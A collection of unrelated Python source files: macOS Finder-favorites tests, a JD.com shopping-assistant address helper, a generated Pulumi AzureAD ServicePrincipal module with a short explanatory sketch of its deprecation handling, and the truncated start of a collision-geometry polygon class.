# from DemetriBairaktaris/PyMacFavorites (MIT)
##################################################################
import getpass
import tempfile
import os
import py_mac_favorites
def test_get_favorites():
assert py_mac_favorites.get_favorites(getpass.getuser()) is not None
def test_is_favorite():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
assert py_mac_favorites.is_favorite(getpass.getuser(), favorites[0])
def test_is_favorite_input_is_missing_trailing_slash():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
favorite = favorites[0]
favorite = favorite.rstrip('/')
assert py_mac_favorites.is_favorite(getpass.getuser(), favorite)
def test_is_favorite_input_has_trailing_slash():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
favorite = favorites[0]
favorite = favorite.rstrip('/') + '/'
assert py_mac_favorites.is_favorite(getpass.getuser(), favorite)
def test_is_favorite_none_path():
with pytest.raises(Exception):
py_mac_favorites.is_favorite(getpass.getuser(), None)
def test_is_favorite_empty_str():
with pytest.raises(Exception):
py_mac_favorites.is_favorite(getpass.getuser(), "")
def test_add_favorite():
current_favorites = py_mac_favorites.get_favorites(getpass.getuser())
new_dir = tempfile.TemporaryDirectory()
assert new_dir.name not in current_favorites
assert os.path.exists(new_dir.name)
py_mac_favorites.set_favorite(getpass.getuser(), new_dir.name)
assert py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
py_mac_favorites.delete_favorite(getpass.getuser(), new_dir.name)
new_dir.cleanup()
def test_delete_favorite():
current_favorites = py_mac_favorites.get_favorites(getpass.getuser())
new_dir = tempfile.TemporaryDirectory()
assert new_dir.name not in current_favorites
assert os.path.exists(new_dir.name)
py_mac_favorites.set_favorite(getpass.getuser(), new_dir.name)
assert py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
py_mac_favorites.delete_favorite(getpass.getuser(), new_dir.name)
assert not py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
new_dir.cleanup()

##################################################################
# src/address_util.py
# from TKaxv-7S/jd-assistant (MIT)
##################################################################
import json
import random
import time
from log import logger
def get_user_address(main_obj):
if main_obj.use_new:
address_url = 'https://wq.jd.com/deal/recvaddr/getrecvaddrlistV3'
address_params = {
'adid': '',
'reg': '1',
'r': random.random(),
'sceneval': '2'
# ,'callback': 'cbLoadAddressListA'
}
address_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://wqs.jd.com/',
'User-Agent': main_obj.user_agent
}
default_address_json = None
ipLocation = None
province_id = None
address_count = 0
time.sleep(0.05)
while True:
try:
address_resp = main_obj.sess.get(url=address_url, params=address_params,
headers=address_headers, allow_redirects=False)
default_address_json = json.loads(address_resp.text)['list'][0]
province_id = default_address_json['provinceId']
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
finally:
time.sleep(0.05)
area_url = 'https://fts.jd.com/area/get'
area_params = {
'fid': '4744'
}
area_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
address_count = 0
while True:
try:
area_resp = main_obj.sess.get(url=area_url, params=area_params,
headers=area_headers, allow_redirects=False)
area_json = json.loads(area_resp.text)
for area in area_json:
if str(area['id']) == province_id:
ipLocation = str(area['name'].encode('unicode_escape'), encoding="utf-8").replace('\\u', '%u')
break
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
cookies = main_obj.sess.cookies
# print(cookies.items())
if province_id is not None and ipLocation is not None:
# cookies.set('ipLoc-djd',
# f'{province_id}-{default_address_json["cityId"]}-0',
# domain='.jd.com', path='/')
# cookies.set('ipLocation', ipLocation, domain='.jd.com', path='/')
main_obj.area_id = f'{province_id}_{default_address_json["cityId"]}_{default_address_json["countyId"]}_{default_address_json["townId"]}'
return True
else:
return False
else:
address_url = 'https://cd.jd.com/usual/address'
address_params = {
'_': str(int(time.time() * 1000))
}
address_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
default_address_json = None
ipLocation = None
province_id = None
address_count = 0
time.sleep(0.05)
while True:
try:
address_resp = main_obj.sess.get(url=address_url, params=address_params,
headers=address_headers, allow_redirects=False)
default_address_json = json.loads(address_resp.text)[0]
province_id = default_address_json['provinceId']
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
finally:
time.sleep(0.05)
area_url = 'https://fts.jd.com/area/get'
area_params = {
'fid': '0'
}
area_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
address_count = 0
while True:
try:
area_resp = main_obj.sess.get(url=area_url, params=area_params,
headers=area_headers, allow_redirects=False)
area_json = json.loads(area_resp.text)
for area in area_json:
if area['id'] == province_id:
ipLocation = str(area['name'].encode('unicode_escape'), encoding="utf-8").replace('\\u', '%u')
break
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
cookies = main_obj.sess.cookies
# print(cookies.items())
if province_id is not None and ipLocation is not None:
cookies.set('ipLoc-djd',
f'{province_id}-{default_address_json["cityId"]}-{default_address_json["countyId"]}-{default_address_json["townId"]}.{default_address_json["id"]}',
domain='.jd.com', path='/')
cookies.set('ipLocation', ipLocation, domain='.jd.com', path='/')
main_obj.area_id = f'{province_id}_{default_address_json["cityId"]}_{default_address_json["countyId"]}_{default_address_json["townId"]}'
return True
else:
return False

##################################################################
# sdk/python/pulumi_azuread/service_principal.py
# from ragnarstolsmark/pulumi-azuread (ECL-2.0 / Apache-2.0)
##################################################################
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServicePrincipalArgs', 'ServicePrincipal']
@pulumi.input_type
class ServicePrincipalArgs:
def __init__(__self__, *,
application_id: pulumi.Input[str],
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ServicePrincipal resource.
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
pulumi.set(__self__, "application_id", application_id)
if app_role_assignment_required is not None:
pulumi.set(__self__, "app_role_assignment_required", app_role_assignment_required)
if oauth2_permission_scopes is not None:
pulumi.set(__self__, "oauth2_permission_scopes", oauth2_permission_scopes)
if oauth2_permissions is not None:
warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
if oauth2_permissions is not None:
pulumi.set(__self__, "oauth2_permissions", oauth2_permissions)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Input[str]:
"""
The App ID of the Application for which to create a Service Principal.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="appRoleAssignmentRequired")
def app_role_assignment_required(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
"""
return pulumi.get(self, "app_role_assignment_required")
@app_role_assignment_required.setter
def app_role_assignment_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "app_role_assignment_required", value)
@property
@pulumi.getter(name="oauth2PermissionScopes")
def oauth2_permission_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]:
"""
A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
"""
return pulumi.get(self, "oauth2_permission_scopes")
@oauth2_permission_scopes.setter
def oauth2_permission_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]):
pulumi.set(self, "oauth2_permission_scopes", value)
@property
@pulumi.getter(name="oauth2Permissions")
def oauth2_permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]:
"""
(**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
"""
return pulumi.get(self, "oauth2_permissions")
@oauth2_permissions.setter
def oauth2_permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]):
pulumi.set(self, "oauth2_permissions", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags to apply to the Service Principal.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServicePrincipalState:
def __init__(__self__, *,
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServicePrincipal resources.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]] app_roles: A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[str] display_name: Display name for the permission that appears in the admin consent and app assignment experiences.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[str] object_id: The Object ID of the Service Principal.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
if app_role_assignment_required is not None:
pulumi.set(__self__, "app_role_assignment_required", app_role_assignment_required)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if oauth2_permission_scopes is not None:
pulumi.set(__self__, "oauth2_permission_scopes", oauth2_permission_scopes)
if oauth2_permissions is not None:
warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
if oauth2_permissions is not None:
pulumi.set(__self__, "oauth2_permissions", oauth2_permissions)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="appRoleAssignmentRequired")
def app_role_assignment_required(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
"""
return pulumi.get(self, "app_role_assignment_required")
@app_role_assignment_required.setter
def app_role_assignment_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "app_role_assignment_required", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]]:
"""
A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The App ID of the Application for which to create a Service Principal.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the permission that appears in the admin consent and app assignment experiences.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="oauth2PermissionScopes")
def oauth2_permission_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]:
"""
A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
"""
return pulumi.get(self, "oauth2_permission_scopes")
@oauth2_permission_scopes.setter
def oauth2_permission_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]):
pulumi.set(self, "oauth2_permission_scopes", value)
@property
@pulumi.getter(name="oauth2Permissions")
def oauth2_permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]:
"""
(**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
"""
return pulumi.get(self, "oauth2_permissions")
@oauth2_permissions.setter
def oauth2_permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]):
pulumi.set(self, "oauth2_permissions", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The Object ID of the Service Principal.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags to apply to the Service Principal.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)

class ServicePrincipal(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
                 application_id: Optional[pulumi.Input[str]] = None,
                 oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
                 oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 __props__=None):
        """
        Manages a Service Principal associated with an Application within Azure Active Directory.

        > **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API. Please see the Granting a Service Principal permission to manage AAD guide for the required steps.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azuread as azuread

        example_application = azuread.Application("exampleApplication",
            display_name="example",
            homepage="http://homepage",
            identifier_uris=["http://uri"],
            reply_urls=["http://replyurl"],
            available_to_other_tenants=False,
            oauth2_allow_implicit_flow=True)
        example_service_principal = azuread.ServicePrincipal("exampleServicePrincipal",
            application_id=example_application.application_id,
            app_role_assignment_required=False,
            tags=[
                "example",
                "tags",
                "here",
            ])
        ```

        ## Import

        Azure Active Directory Service Principals can be imported using the `object id`, e.g.

        ```sh
        $ pulumi import azuread:index/servicePrincipal:ServicePrincipal test 00000000-0000-0000-0000-000000000000
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
        :param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ServicePrincipalArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Service Principal associated with an Application within Azure Active Directory.

        > **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API. Please see the Granting a Service Principal permission to manage AAD guide for the required steps.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azuread as azuread

        example_application = azuread.Application("exampleApplication",
            display_name="example",
            homepage="http://homepage",
            identifier_uris=["http://uri"],
            reply_urls=["http://replyurl"],
            available_to_other_tenants=False,
            oauth2_allow_implicit_flow=True)
        example_service_principal = azuread.ServicePrincipal("exampleServicePrincipal",
            application_id=example_application.application_id,
            app_role_assignment_required=False,
            tags=[
                "example",
                "tags",
                "here",
            ])
        ```

        ## Import

        Azure Active Directory Service Principals can be imported using the `object id`, e.g.

        ```sh
        $ pulumi import azuread:index/servicePrincipal:ServicePrincipal test 00000000-0000-0000-0000-000000000000
        ```

        :param str resource_name: The name of the resource.
        :param ServicePrincipalArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(ServicePrincipalArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
                       application_id: Optional[pulumi.Input[str]] = None,
                       oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
                       oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ServicePrincipalArgs.__new__(ServicePrincipalArgs)

            __props__.__dict__["app_role_assignment_required"] = app_role_assignment_required
            if application_id is None and not opts.urn:
                raise TypeError("Missing required property 'application_id'")
            __props__.__dict__["application_id"] = application_id
            __props__.__dict__["oauth2_permission_scopes"] = oauth2_permission_scopes
            if oauth2_permissions is not None and not opts.urn:
                warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
                pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
            __props__.__dict__["oauth2_permissions"] = oauth2_permissions
            __props__.__dict__["tags"] = tags
            __props__.__dict__["app_roles"] = None
            __props__.__dict__["display_name"] = None
            __props__.__dict__["object_id"] = None
        super(ServicePrincipal, __self__).__init__(
            'azuread:index/servicePrincipal:ServicePrincipal',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
            app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalAppRoleArgs']]]]] = None,
            application_id: Optional[pulumi.Input[str]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
            oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
            object_id: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'ServicePrincipal':
        """
        Get an existing ServicePrincipal resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalAppRoleArgs']]]] app_roles: A collection of `app_roles` blocks as documented below. For more information see the [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
        :param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
        :param pulumi.Input[str] display_name: Display name for the permission that appears in the admin consent and app assignment experiences.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
        :param pulumi.Input[str] object_id: The Object ID of the Service Principal.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ServicePrincipalState.__new__(_ServicePrincipalState)

        __props__.__dict__["app_role_assignment_required"] = app_role_assignment_required
        __props__.__dict__["app_roles"] = app_roles
        __props__.__dict__["application_id"] = application_id
        __props__.__dict__["display_name"] = display_name
        __props__.__dict__["oauth2_permission_scopes"] = oauth2_permission_scopes
        __props__.__dict__["oauth2_permissions"] = oauth2_permissions
        __props__.__dict__["object_id"] = object_id
        __props__.__dict__["tags"] = tags
        return ServicePrincipal(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="appRoleAssignmentRequired")
    def app_role_assignment_required(self) -> pulumi.Output[Optional[bool]]:
        """
        Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
        """
        return pulumi.get(self, "app_role_assignment_required")

    @property
    @pulumi.getter(name="appRoles")
    def app_roles(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalAppRole']]:
        """
        A collection of `app_roles` blocks as documented below. For more information see the [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
        """
        return pulumi.get(self, "app_roles")

    @property
    @pulumi.getter(name="applicationId")
    def application_id(self) -> pulumi.Output[str]:
        """
        The App ID of the Application for which to create a Service Principal.
        """
        return pulumi.get(self, "application_id")

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Output[str]:
        """
        Display name for the permission that appears in the admin consent and app assignment experiences.
        """
        return pulumi.get(self, "display_name")

    @property
    @pulumi.getter(name="oauth2PermissionScopes")
    def oauth2_permission_scopes(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalOauth2PermissionScope']]:
        """
        A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
        """
        return pulumi.get(self, "oauth2_permission_scopes")

    @property
    @pulumi.getter(name="oauth2Permissions")
    def oauth2_permissions(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalOauth2Permission']]:
        """
        (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
        """
        return pulumi.get(self, "oauth2_permissions")

    @property
    @pulumi.getter(name="objectId")
    def object_id(self) -> pulumi.Output[str]:
        """
        The Object ID of the Service Principal.
        """
        return pulumi.get(self, "object_id")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of tags to apply to the Service Principal.
        """
        return pulumi.get(self, "tags")
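The `oauth2_permissions` handling above warns but still forwards the deprecated input. A minimal, dependency-free sketch of that deprecation pattern follows; the function name and returned dict shape are illustrative only, not part of the generated Pulumi SDK:

```python
import warnings


def make_service_principal(application_id, oauth2_permission_scopes=None,
                           oauth2_permissions=None):
    """Toy constructor mirroring the deprecation handling in _internal_init."""
    if oauth2_permissions is not None:
        # Emit a DeprecationWarning but still honour the old argument,
        # as the generated code does for backwards compatibility.
        warnings.warn(
            "oauth2_permissions is deprecated; use oauth2_permission_scopes",
            DeprecationWarning,
            stacklevel=2,
        )
        if oauth2_permission_scopes is None:
            oauth2_permission_scopes = oauth2_permissions
    if application_id is None:
        raise TypeError("Missing required property 'application_id'")
    return {"application_id": application_id,
            "oauth2_permission_scopes": oauth2_permission_scopes}


with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    sp = make_service_principal("00000000-0000-0000-0000-000000000000",
                                oauth2_permissions=["user_impersonation"])

print(sp["oauth2_permission_scopes"])  # ['user_impersonation']
print(len(caught))                     # 1
```

The key design point mirrored here is that deprecation is a warning, not an error: existing programs keep working while the warning steers callers to the new name.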

# collision/poly.py (from nightimer-AU/collision, MIT license)

import math
from .util import Vector
from . import tripy

POLY_RECALC_ATTRS = ["angle"]


class Poly:
    def __init__(self, pos, points, angle=0):
        self.pos = pos
        self.__dict__["angle"] = angle
        self.set_points(points)

    @classmethod
    def from_box(cls, center, width, height):
        hw = width / 2
        hh = height / 2
